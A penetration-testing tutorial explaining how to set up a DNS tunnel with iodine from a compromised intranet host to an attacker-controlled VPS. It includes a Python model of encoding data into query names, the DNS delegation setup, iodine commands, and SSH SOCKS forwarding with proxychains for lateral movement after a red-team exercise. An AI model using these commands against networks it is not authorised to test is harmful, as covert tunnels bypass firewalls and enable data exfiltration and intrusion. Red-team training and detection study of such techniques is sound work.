Author: D1m0n

Preface

At the beginning of the year I had the honor of taking part in an HVV exercise, where I was mainly responsible for intranet penetration, including building proxies and lateral movement. At the time I had been in the security field for barely two months, so I was pushed onto the battlefield while still learning. Fortunately, I obtained system privileges through a WebLogic deserialization RCE. Then I ran into an embarrassing problem: the target host could not get online. With the help of search engines I found that the experts were using reGeorg and Pystinger, both of which run a SOCKS proxy through a webshell in order to penetrate the intranet. In the end I did achieve the goal and scored some points on the internal network. After returning to school, I found that there is an even more powerful technique... setting up a DNS tunnel.

Introduction to DNS tunnels

A DNS tunnel is one kind of tunneling technique. When upper-layer protocols such as HTTP and HTTPS cannot be forwarded, or port forwarding fails, a DNS tunnel can be used instead. DNS tunnels are hard to block, because normal services and applications inevitably rely on DNS for name resolution, so firewalls let DNS traffic through. Now suppose that on the machine with no Internet access we query a name under a domain we control (for example ***.test.cn). The local DNS server cannot answer it from its cache, so it resolves the name iteratively across the Internet (root servers, then the servers for .cn) until it reaches the authoritative DNS server for the queried domain. Since we registered ourselves as that authoritative server, the query finally lands on the malicious DNS server we set up in advance, and the host without Internet access is now exchanging data with our server: upstream data goes out encoded in the queried names, and downstream data comes back in the answers. The host itself never needs a route to the Internet; it only needs to be able to talk to an internal resolver that forwards queries outward. Two caveats a practitioner should keep in mind: throughput is low, since every upstream packet has to fit inside a domain name, and the resulting traffic (a flood of long, high-entropy subdomains under one zone, often NULL or TXT queries) stands out in resolver logs even though the firewall allows it.
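To make the mechanism above concrete, here is a toy model, added for this article and not iodine's own code, of how the client packs upstream data into query names under the delegated zone and how the authoritative side unpacks them, including the 63-octet label and 255-octet name limits that cap how much each query can carry. The zone name dns2tcp.xxx.com is the one used in the setup later in the article; the sample payload is constructed. Real iodine adds its own framing, sequence numbers and a downstream channel in the answers, which this model omits.

```python
import base64
import struct

# Assumption: the tunnel zone delegated to the VPS in the article's DNS setup.
TUNNEL_DOMAIN = "dns2tcp.xxx.com"
MAX_LABEL = 63    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253    # RFC 1035: 255 octets on the wire, i.e. 253 characters in dotted text form
QTYPE_NULL = 10   # iodine's default query type; 16 would be TXT


def max_payload_per_query(domain=TUNNEL_DOMAIN):
    """Raw bytes that fit in one query name after base32 expansion, label dots and the zone suffix."""
    budget = MAX_NAME - len(domain) - 1        # characters left for "<payload labels>."
    chars = 0
    while (chars + 1) + chars // MAX_LABEL <= budget:   # every full 63-char label costs one dot
        chars += 1
    return chars * 5 // 8                      # base32: 8 characters carry 5 bytes


def encode_chunk(data, domain=TUNNEL_DOMAIN):
    """Client side: pack one chunk of upstream data into a query name.
    Base32 is used because DNS names are case-insensitive (a resolver may fold case, which
    would corrupt base64); the '=' padding is dropped since it is not a legal label character."""
    if not 0 < len(data) <= max_payload_per_query(domain):
        raise ValueError("chunk is empty or too large for one query")
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    return ".".join(labels + [domain])


def decode_chunk(qname, domain=TUNNEL_DOMAIN):
    """Server side (authoritative for the tunnel zone): recover the chunk from the query name."""
    suffix = "." + domain.lower()
    if not qname.lower().endswith(suffix):
        raise ValueError("query is not for the tunnel zone")
    text = qname[:-len(suffix)].replace(".", "").upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))   # restore the padding


def build_query(qname, txid, qtype=QTYPE_NULL):
    """Wire-format DNS query: 12-byte header, length-prefixed labels, QTYPE, QCLASS IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags 0x0100 = recursion desired
    name = b""
    for label in qname.split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= MAX_LABEL:
            raise ValueError("label length out of range")
        name += struct.pack("!B", len(raw)) + raw
    name += b"\x00"
    if len(name) > MAX_NAME + 2:
        raise ValueError("name longer than 255 octets on the wire")
    return header + name + struct.pack("!HH", qtype, 1)


def parse_query(packet):
    """Server side: pull (txid, qname, qtype) out of a raw query packet."""
    txid = struct.unpack("!H", packet[:2])[0]
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    qtype = struct.unpack("!H", packet[pos + 1:pos + 3])[0]
    return txid, ".".join(labels), qtype


def tunnel_upstream(data, domain=TUNNEL_DOMAIN):
    """Split a payload into the minimum number of queries the name-length limit allows."""
    size = max_payload_per_query(domain)
    return [build_query(encode_chunk(data[off:off + size], domain), txid=i & 0xFFFF)
            for i, off in enumerate(range(0, len(data), size))]


def receive_upstream(packets, domain=TUNNEL_DOMAIN):
    """Reassemble what the server saw; a real tunnel also needs sequence numbers and acks."""
    return b"".join(decode_chunk(parse_query(p)[1], domain) for p in packets)


if __name__ == "__main__":
    payload = bytes(range(256)) * 4          # constructed 1 KiB sample standing in for a TCP segment
    queries = tunnel_upstream(payload)
    print(f"{max_payload_per_query()} bytes per query, {len(queries)} queries for {len(payload)} bytes")
    print(parse_query(queries[0])[1])        # one 253-character name: four base32 labels plus the zone
    assert receive_upstream(queries) == payload
```

Running it shows that a 15-character zone name leaves room for 146 bytes per query, so a 1 KiB payload already needs 8 DNS queries, each a 253-character name made of four base32 labels. That is both why the tunnel is slow and why it is easy to spot in resolver logs; iodine's -M option (used later in the article) lowers the maximum name length further when a resolver in the path rejects long names.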

Recommended tools for building DNS tunnels

There are many tools for building DNS tunnels, including iodine, dns2tcp, dnscat2 and so on. After trying them, I recommend iodine: it is very simple and convenient.

Preparation

Since the DNS service will run on our VPS, the domain name has to be configured first. Here is an example using a cloud provider's DNS console:

The first record is an A record: it tells the domain name system that the IP address of dns.xxx.com is 175.xxx.xxx.xxx, our VPS.

The second record is an NS record: it tells the DNS system that the zone dns2tcp.xxx.com is served by the nameserver dns.xxx.com, i.e. the subdomain is delegated to that host.

As a result, every name under dns2tcp.xxx.com is resolved by the host at 175.xxx.xxx.xxx, which is our VPS. UDP port 53 on the VPS must therefore be reachable from the Internet and must not already be occupied by a local resolver (such as systemd-resolved), because iodined needs to bind it.

After the configuration is complete, ping dns.xxx.com to check that the A record resolves. To check the delegation as well, look up the NS record of dns2tcp.xxx.com from an outside machine and make sure dns.xxx.com comes back.

Building the tunnel

1. Install iodine. Here I use Linux as an example; on Windows, download and install the corresponding version of iodine.

apt-get install iodine

2. Run the iodined server on the VPS. Once it starts, a virtual NIC with the tunnel address is added on the VPS:

iodined -f -c -P d1m0n -DD 192.168.0.1 dns2tcp.xxx.com
 # -f: run in the foreground
 # -c: do not check that every incoming packet comes from the client IP/port that logged in (needed when the intranet's resolvers forward queries from changing source addresses)
 # -P: password used for authentication between client and server (uppercase P; lowercase -p is the UDP port to listen on)
 # -D: debug level; -DD is the second level, and each additional D raises it
 # 192.168.0.1: the server's address on the virtual tunnel network; choose a subnet that does not collide with an existing network segment
 # Attention! The last argument is the subdomain delegated by the NS record (dns2tcp.xxx.com), not the nameserver's own name

3. Run the iodine client on the machine that needs to get out. Here I use Kali, which already ships with iodine:

iodine -f -P d1m0n -M 200 dns2tcp.xxx.com

 # -f: run in the foreground
 # -P: password used for authentication between client and server
 # -M: maximum length of the upstream hostname (the encoded query name); the default is 255, lower it if a resolver in the path rejects long names
 # -m: maximum downstream fragment size (how much data each answer carries); autodetected by default
 # -r: force DNS-only operation; by default iodine probes whether raw UDP to the server is reachable and switches to it if so, which -r disables
 # -T: DNS request type: NULL (default), PRIVATE, TXT, SRV, MX, CNAME or A
 # -O: downstream data encoding: Base32, Base64, Base64u or Raw
 # -L: lazy mode switch; -L1 (the default) lets the server hold a request until it has data to send, -L0 disables it
 # -I: maximum interval in seconds between two requests, so the tunnel stays alive through the resolver

Ping the VPS's tunnel address (192.168.0.1) from the client to see whether the DNS tunnel is up. iodined hands the first client the next address in the subnet, 192.168.0.2, so the two ends can reach each other over the tunnel interface:

At this point the job is only half done; for intranet penetration we still have to move laterally. There are many SOCKS proxy tools, and the simplest and most portable one is SSH itself: it is normally used to log in to remote hosts and encrypts everything it carries, but with dynamic port forwarding it also acts as a SOCKS server. Suppose the malicious DNS server (the VPS) is the jump host and Kali (the iodine client) is the attack machine. On the Kali side run:

ssh -N -D 8080 user@192.168.0.1
 # -N: do not execute a remote command or start a shell, because we only want the forwarding
 # -D: dynamic port forwarding; the SOCKS proxy listens on local port 8080
 # user: an account on our VPS
 # 192.168.0.1: the VPS's address on the tunnel interface, so the SSH session itself travels through the DNS tunnel

After the VPS SSH password is entered, the forwarding starts. Note the direction: this gives the machine running the iodine client a SOCKS proxy whose traffic exits at the VPS, which is what this lab verifies below. On a real pivot host, to let the VPS reach the intranet instead, either connect from the VPS with -D to an SSH service on the pivot host's tunnel address (192.168.0.2), or run a reverse forward (ssh -R) from the pivot host. Next, configure proxychains4 by editing its configuration so that the [ProxyList] section points at the SOCKS port opened by SSH (socks5 127.0.0.1 8080); enabling proxy_dns there also sends name lookups through the proxy instead of leaking them to the local resolver.

vim /etc/proxychains4.conf 

Finally, verify that the proxy works:

proxychains4 curl http://www.baidu.com

Done. What follows is the time to roam the network ~